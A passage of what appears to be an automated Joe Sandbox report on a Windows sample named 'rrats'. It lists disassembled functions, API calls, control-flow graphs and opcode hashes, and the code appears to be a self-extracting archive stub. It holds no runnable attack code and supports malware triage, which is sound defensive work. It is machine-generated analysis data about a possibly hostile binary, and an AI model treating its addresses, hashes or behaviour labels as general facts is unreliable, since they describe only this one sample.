                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00CC57FB,00CC57FB,?,?,?,00CCABAC,00000001,00000001,2DE85006), ref: 00CCA9B5
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00CCABAC,00000001,00000001,2DE85006,?,?,?), ref: 00CCAA3B
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00CCAB35
                                                              • __freea.LIBCMT ref: 00CCAB42
                                                                • Part of subcall function 00CC8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CC4286,?,0000015D,?,?,?,?,00CC5762,000000FF,00000000,?,?), ref: 00CC8E38
                                                              • __freea.LIBCMT ref: 00CCAB4B
                                                              • __freea.LIBCMT ref: 00CCAB70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: 245ba948d1e13530cf56635c5418c7793051f5f33c4d56fbbbae85e789af1e79
                                                              • Instruction ID: 09d8fee3208e3345e85151fd557d9c8c17fb98e3b4330ff46c023a6a1ed9bd4e
                                                              • Opcode Fuzzy Hash: 245ba948d1e13530cf56635c5418c7793051f5f33c4d56fbbbae85e789af1e79
                                                              • Instruction Fuzzy Hash: DB51F272A0021AAFDB258F64CC59FBFB7AAEB40718F15462DFC14D6140EB30DD40E692
                                                              Function 00CBDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 972 cbdc3b-cbdc54 WaitForSingleObject 973 cbdc9c-cbdc9e 972->973 974 cbdc56-cbdc57 972->974 975 cbdc59-cbdc69 PeekMessageW 974->975 976 cbdc6b-cbdc86 GetMessageW TranslateMessage DispatchMessageW 975->976 977 cbdc8c-cbdc99 WaitForSingleObject 975->977 976->977 977->975 978 cbdc9b 977->978 978->973
                                                              APIs
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CBDC47
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBDC61
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBDC72
                                                              • TranslateMessage.USER32(?), ref: 00CBDC7C
                                                              • DispatchMessageW.USER32(?), ref: 00CBDC86
                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CBDC91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 2148572870-0
                                                              • Opcode ID: 429d20a1f09219ab811ac04a18f5b1632411be6f957f44b6feff585238e7a34e
                                                              • Instruction ID: 242c7749d7a0ce8705a077b684fd15e47fbb43a09290e7fb815f35b02531c273
                                                              • Opcode Fuzzy Hash: 429d20a1f09219ab811ac04a18f5b1632411be6f957f44b6feff585238e7a34e
                                                              • Instruction Fuzzy Hash: E2F03C72A02219BBCB206BA5DC4CEDF7F6DEF41791F004011B51AE2151E675D646C7B1
                                                              Function 00CBCE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 979 cbce87-cbce8a 980 cbd009-cbd00c 979->980 981 cbce90-cbceb5 GetTempPathW call cab690 979->981 983 cbd3d9-cbd404 call cbb314 980->983 984 cbd012-cbd018 980->984 989 cbceb9-cbcee5 call ca4092 call caa231 981->989 991 cbd40a-cbd418 983->991 992 cbc793-cbc7a1 983->992 986 cbd01a 984->986 987 cbd024-cbd02b 984->987 986->987 987->983 1001 cbceb7-cbceb8 989->1001 1002 cbcee7-cbcefe SetDlgItemTextW 989->1002 996 cbc7a2-cbc7b7 call cbaf98 992->996 1003 cbc7b9 996->1003 1001->989 1002->983 1004 cbcf04-cbcf0a 1002->1004 1005 cbc7bb-cbc7d0 call cb1fbb 1003->1005 1004->983 1006 cbcf10-cbcf2b call cc22c6 1004->1006 1010 cbc7dd-cbc7e0 1005->1010 1011 cbc7d2-cbc7d6 1005->1011 1015 cbcf7b-cbcf82 1006->1015 1016 cbcf2d-cbcf39 1006->1016 1010->983 1014 cbc7e6 1010->1014 1011->1005 1013 cbc7d8 1011->1013 1013->983 1017 cbca5f-cbca61 1014->1017 1018 cbc9be-cbc9c0 1014->1018 1019 cbc7ed-cbc7f0 1014->1019 1020 cbca7c-cbca7e 1014->1020 1021 cbcfb4-cbcfe4 call cbadd2 call cba7e4 1015->1021 1022 cbcf84-cbcfaf call cb0602 * 2 1015->1022 1016->1015 1023 cbcf3b 1016->1023 1017->983 1024 cbca67-cbca77 SetWindowTextW 1017->1024 1018->983 1026 cbc9c6-cbc9d2 1018->1026 1019->983 1027 cbc7f6-cbc850 call cba64d call cabdf3 call caa544 call caa67e call ca6edb 1019->1027 1020->983 1025 cbca84-cbca8b 1020->1025 1021->983 1061 cbcfea-cbd004 EndDialog 1021->1061 1022->1021 1030 cbcf3e-cbcf42 1023->1030 1024->983 1025->983 1033 cbca91-cbcaaa 1025->1033 1034 cbc9e6-cbc9eb 1026->1034 1035 cbc9d4-cbc9e5 call cc7686 1026->1035 1094 cbc98f-cbc9a4 call caa5d1 1027->1094 1031 cbcf56-cbcf73 call cb0602 1030->1031 1032 cbcf44-cbcf52 1030->1032 1031->1015 1032->1030 1039 cbcf54 1032->1039 1041 cbcaac 1033->1041 1042 cbcab2-cbcac0 call cc3e13 1033->1042 1045 cbc9ed-cbc9f3 1034->1045 1046 cbc9f5-cbca00 call cbb48e 1034->1046 1035->1034 1039->1015 1041->1042 1042->983 1063 cbcac6-cbcacf 1042->1063 1053 cbca05-cbca07 1045->1053 1046->1053 1059 cbca09-cbca10 call cc3e13 1053->1059 1060 cbca12-cbca32 call cc3e13 call cc3e3e 1053->1060 1059->1060 1082 cbca4b-cbca4d 1060->1082 1083 cbca34-cbca3b 1060->1083 1061->983 1068 cbcaf8-cbcafb 1063->1068 1069 cbcad1-cbcad5 1063->1069 1072 cbcb01-cbcb04 1068->1072 1075 cbcbe0-cbcbee call cb0602 1068->1075 1069->1072 1073 cbcad7-cbcadf 1069->1073 1076 cbcb11-cbcb2c 1072->1076 1077 cbcb06-cbcb0b 1072->1077 1073->983 1080 cbcae5-cbcaf3 call cb0602 1073->1080 1092 cbcbf0-cbcc04 call cc279b 1075->1092 1095 cbcb2e-cbcb68 1076->1095 1096 cbcb76-cbcb7d 1076->1096 1077->1075 1077->1076 1080->1092 1082->983 1091 cbca53-cbca5a call cc3e2e 1082->1091 1089 cbca3d-cbca3f 1083->1089 1090 cbca42-cbca4a call cc7686 1083->1090 1089->1090 1090->1082 1091->983 1110 cbcc11-cbcc62 call cb0602 call cbb1be GetDlgItem SetWindowTextW SendMessageW call cc3e49 1092->1110 1111 cbcc06-cbcc0a 1092->1111 1112 cbc9aa-cbc9b9 call caa55a 1094->1112 1113 cbc855-cbc869 SetFileAttributesW 1094->1113 1131 cbcb6a 1095->1131 1132 cbcb6c-cbcb6e 1095->1132 1101 cbcbab-cbcbce call cc3e13 * 2 1096->1101 1102 cbcb7f-cbcb97 call cc3e13 1096->1102 1101->1092 1136 cbcbd0-cbcbde call cb05da 1101->1136 1102->1101 1124 cbcb99-cbcba6 call cb05da 1102->1124 1142 cbcc67-cbcc6b 1110->1142 1111->1110 1114 cbcc0c-cbcc0e 1111->1114 1112->983 1119 cbc90f-cbc91f GetFileAttributesW 1113->1119 1120 cbc86f-cbc8a2 call cab991 call cab690 call cc3e13 1113->1120 1114->1110 1119->1094 1129 cbc921-cbc930 DeleteFileW 1119->1129 1151 cbc8b5-cbc8c3 call cabdb4 1120->1151 1152 cbc8a4-cbc8b3 call cc3e13 1120->1152 1124->1101 1129->1094 1135 cbc932-cbc935 1129->1135 1131->1132 1132->1096 1139 cbc939-cbc965 call ca4092 GetFileAttributesW 1135->1139 1136->1092 1149 cbc937-cbc938 1139->1149 1150 cbc967-cbc97d MoveFileW 1139->1150 1142->983 1146 cbcc71-cbcc85 SendMessageW 1142->1146 1146->983 1149->1139 1150->1094 1153 cbc97f-cbc989 MoveFileExW 1150->1153 1151->1112 1158 cbc8c9-cbc909 call cc3e13 call cbfff0 SHFileOperationW 1151->1158 1152->1151 1152->1158 1153->1094 1158->1119
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 00CBCE9D
                                                                • Part of subcall function 00CAB690: _wcslen.LIBCMT ref: 00CAB696
                                                              • _swprintf.LIBCMT ref: 00CBCED1
                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                              • SetDlgItemTextW.USER32(?,00000066,00CE946A), ref: 00CBCEF1
                                                              • EndDialog.USER32(?,00000001), ref: 00CBCFFE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                              • String ID: %s%s%u
                                                              • API String ID: 110358324-1360425832
                                                              • Opcode ID: 40230a842c38bc80bfc3b0c5638fab6f48e87a342cff1d66b65f6a2e90f7251d
                                                              • Instruction ID: 4a25c9531e98adeed804987f3c157732df656213262a79b87ae721443baf1dbc
                                                              • Opcode Fuzzy Hash: 40230a842c38bc80bfc3b0c5638fab6f48e87a342cff1d66b65f6a2e90f7251d
                                                              • Instruction Fuzzy Hash: 45415FB1900259AADF259FA0DC85FEE77FCEB05340F4080A6F90AE7191EE709A44DF61
                                                              Function 00CC3B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1163 cc3b72-cc3b7c 1164 cc3bee-cc3bf1 1163->1164 1165 cc3b7e-cc3b8c 1164->1165 1166 cc3bf3 1164->1166 1167 cc3b8e-cc3b91 1165->1167 1168 cc3b95-cc3bb1 LoadLibraryExW 1165->1168 1169 cc3bf5-cc3bf9 1166->1169 1170 cc3c09-cc3c0b 1167->1170 1171 cc3b93 1167->1171 1172 cc3bfa-cc3c00 1168->1172 1173 cc3bb3-cc3bbc GetLastError 1168->1173 1170->1169 1175 cc3beb 1171->1175 1172->1170 1174 cc3c02-cc3c03 FreeLibrary 1172->1174 1176 cc3bbe-cc3bd3 call cc6088 1173->1176 1177 cc3be6-cc3be9 1173->1177 1174->1170 1175->1164 1176->1177 1180 cc3bd5-cc3be4 LoadLibraryExW 1176->1180 1177->1175 1180->1172 1180->1177
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00CC3C35,00000000,00000FA0,00D02088,00000000,?,00CC3D60,00000004,InitializeCriticalSectionEx,00CD6394,InitializeCriticalSectionEx,00000000), ref: 00CC3C03
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID: api-ms-
                                                              • API String ID: 3664257935-2084034818
                                                              • Opcode ID: db882b74eac273bd3bab8faafdcfcc63ced40b7668a02056780d26989eaa4726
                                                              • Instruction ID: 52baca03c0c62913af53c952ce1905f0eb71615f8be309e607c3a8d44b487bde
                                                              • Opcode Fuzzy Hash: db882b74eac273bd3bab8faafdcfcc63ced40b7668a02056780d26989eaa4726
                                                              • Instruction Fuzzy Hash: 38110635A052A1ABCB228B6CEC55F5D37649F05770F214225F925FB2D0E770EF008AD1
                                                              Function 00CBABAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1181 cbabab-cbabca GetClassNameW 1182 cbabcc-cbabe1 call cb1fbb 1181->1182 1183 cbabf2-cbabf4 1181->1183 1188 cbabe3-cbabef FindWindowExW 1182->1188 1189 cbabf1 1182->1189 1185 cbabff-cbac01 1183->1185 1186 cbabf6-cbabf8 1183->1186 1186->1185 1188->1189 1189->1183
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000050), ref: 00CBABC2
                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00CBABF9
                                                                • Part of subcall function 00CB1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CAC116,00000000,.exe,?,?,00000800,?,?,?,00CB8E3C), ref: 00CB1FD1
                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00CBABE9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                              • String ID: @Ut$EDIT
                                                              • API String ID: 4243998846-2065656831
                                                              • Opcode ID: f64096bb7f54f2186942f590f6e4131be7b6a620a08f184bb280eebbdd98da5f
                                                              • Instruction ID: 749da8f7f7489ddb49b1f9b98851cc2afdd61a7db8fe279d8d709b6a4fec9943
                                                              • Opcode Fuzzy Hash: f64096bb7f54f2186942f590f6e4131be7b6a620a08f184bb280eebbdd98da5f
                                                              • Instruction Fuzzy Hash: 44F0823260132877DB205A649C09FDB766C9B46B40F494016BA59E2280D761DB45C6B6
                                                              Function 00CA98E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1190 ca98e0-ca9901 call cbec50 1193 ca990c 1190->1193 1194 ca9903-ca9906 1190->1194 1196 ca990e-ca991f 1193->1196 1194->1193 1195 ca9908-ca990a 1194->1195 1195->1196 1197 ca9921 1196->1197 1198 ca9927-ca9931 1196->1198 1197->1198 1199 ca9933 1198->1199 1200 ca9936-ca9943 call ca6edb 1198->1200 1199->1200 1203 ca994b-ca996a CreateFileW 1200->1203 1204 ca9945 1200->1204 1205 ca99bb-ca99bf 1203->1205 1206 ca996c-ca998e GetLastError call cabb03 1203->1206 1204->1203 1208 ca99c3-ca99c6 1205->1208 1210 ca99c8-ca99cd 1206->1210 1215 ca9990-ca99b3 CreateFileW GetLastError 1206->1215 1208->1210 1211 ca99d9-ca99de 1208->1211 1210->1211 1212 ca99cf 1210->1212 1213 ca99ff-ca9a10 1211->1213 1214 ca99e0-ca99e3 1211->1214 1212->1211 1217 ca9a2e-ca9a39 1213->1217 1218 ca9a12-ca9a2a call cb0602 1213->1218 1214->1213 1216 ca99e5-ca99f9 SetFileTime 1214->1216 1215->1208 1219 ca99b5-ca99b9 1215->1219 1216->1213 1218->1217 1219->1208
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00CA7760,?,00000005,?,00000011), ref: 00CA995F
                                                              • GetLastError.KERNEL32(?,?,00CA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA996C
                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00CA7760,?,00000005,?), ref: 00CA99A2
                                                              • GetLastError.KERNEL32(?,?,00CA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA99AA
                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00CA7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00CA99F9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: File$CreateErrorLast$Time
                                                              • String ID:
                                                              • API String ID: 1999340476-0
                                                              • Opcode ID: 071dc1233f5bacbab56b7f8b50ac12f6649e342c72fc678fe1b3119df82c96bd
                                                              • Instruction ID: a3b218c756548c5e7ec44cf139d3596cc0db730fc16133e03ca362589a30111a
                                                              • Opcode Fuzzy Hash: 071dc1233f5bacbab56b7f8b50ac12f6649e342c72fc678fe1b3119df82c96bd
                                                              • Instruction Fuzzy Hash: 0C3115305443867FE7209B34CC46BDBBB98FB06328F100B19F9B5961D1D7B5AA44CB95
                                                              Function 00CBB568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1249 cbb568-cbb581 PeekMessageW 1250 cbb5bc-cbb5be 1249->1250 1251 cbb583-cbb597 GetMessageW 1249->1251 1252 cbb599-cbb5a6 IsDialogMessageW 1251->1252 1253 cbb5a8-cbb5b6 TranslateMessage DispatchMessageW 1251->1253 1252->1250 1252->1253 1253->1250
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBB579
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBB58A
                                                              • IsDialogMessageW.USER32(0001046A,?), ref: 00CBB59E
                                                              • TranslateMessage.USER32(?), ref: 00CBB5AC
                                                              • DispatchMessageW.USER32(?), ref: 00CBB5B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                              • String ID:
                                                              • API String ID: 1266772231-0
                                                              • Opcode ID: e3ecf8d4c8e05dae66c7302f54da6ee22830ddd65d8600e134fdcf40729098a9
                                                              • Instruction ID: 8af23210dca3a17d852ca747d23db509c157c7b28cf8cdaf25952a7b43684812
                                                              • Opcode Fuzzy Hash: e3ecf8d4c8e05dae66c7302f54da6ee22830ddd65d8600e134fdcf40729098a9
                                                              • Instruction Fuzzy Hash: CDF06D71E0221AABDB209FE6AC4CEDB7FACEE056917404415B519D2150EB74D609CBB1
                                                              Function 00CBAC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00CB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CB0836
                                                                • Part of subcall function 00CB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAF2D8,Crypt32.dll,00000000,00CAF35C,?,?,00CAF33E,?,?,?), ref: 00CB0858
                                                              • OleInitialize.OLE32(00000000), ref: 00CBAC2F
                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CBAC66
                                                              • SHGetMalloc.SHELL32(00CE8438), ref: 00CBAC70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                              • String ID: riched20.dll
                                                              • API String ID: 3498096277-3360196438
                                                              • Opcode ID: 71b97543c348c97e38503ebaa6a4315ed4b1623cd9857f90c0b1630e988ff3f9
                                                              • Instruction ID: 8272c69b5e25e3c8e62dfbfc42204234d74b506de2a2d793bc88bc7ccd216bc4
                                                              • Opcode Fuzzy Hash: 71b97543c348c97e38503ebaa6a4315ed4b1623cd9857f90c0b1630e988ff3f9
                                                              • Instruction Fuzzy Hash: 67F01DB1D00209ABCB10AFAAD849AEFFFFCEF94700F00416AE515E2251DBB45605CFA1
                                                              Function 00CBDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CBDBF4
                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CBDC30
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentVariable
                                                              • String ID: sfxcmd$sfxpar
                                                              • API String ID: 1431749950-3493335439
                                                              • Opcode ID: 44f7083447d7afb38c5bb7674e571573068d0549dd20e7105fb03ee40d815d36
                                                              • Instruction ID: f1e191425bc3e1b91b6e20fcf4e2fe5d10b4f39f0754ecd775294a8a7b736170
                                                              • Opcode Fuzzy Hash: 44f7083447d7afb38c5bb7674e571573068d0549dd20e7105fb03ee40d815d36
                                                              • Instruction Fuzzy Hash: 00F065B2505235ABDB202F959C0AFFF7F98BF15B82F040466BE8796151E6B08940E6B1
                                                              Function 00CA9785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00CA9795
                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00CA97AD
                                                              • GetLastError.KERNEL32 ref: 00CA97DF
                                                              • GetLastError.KERNEL32 ref: 00CA97FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
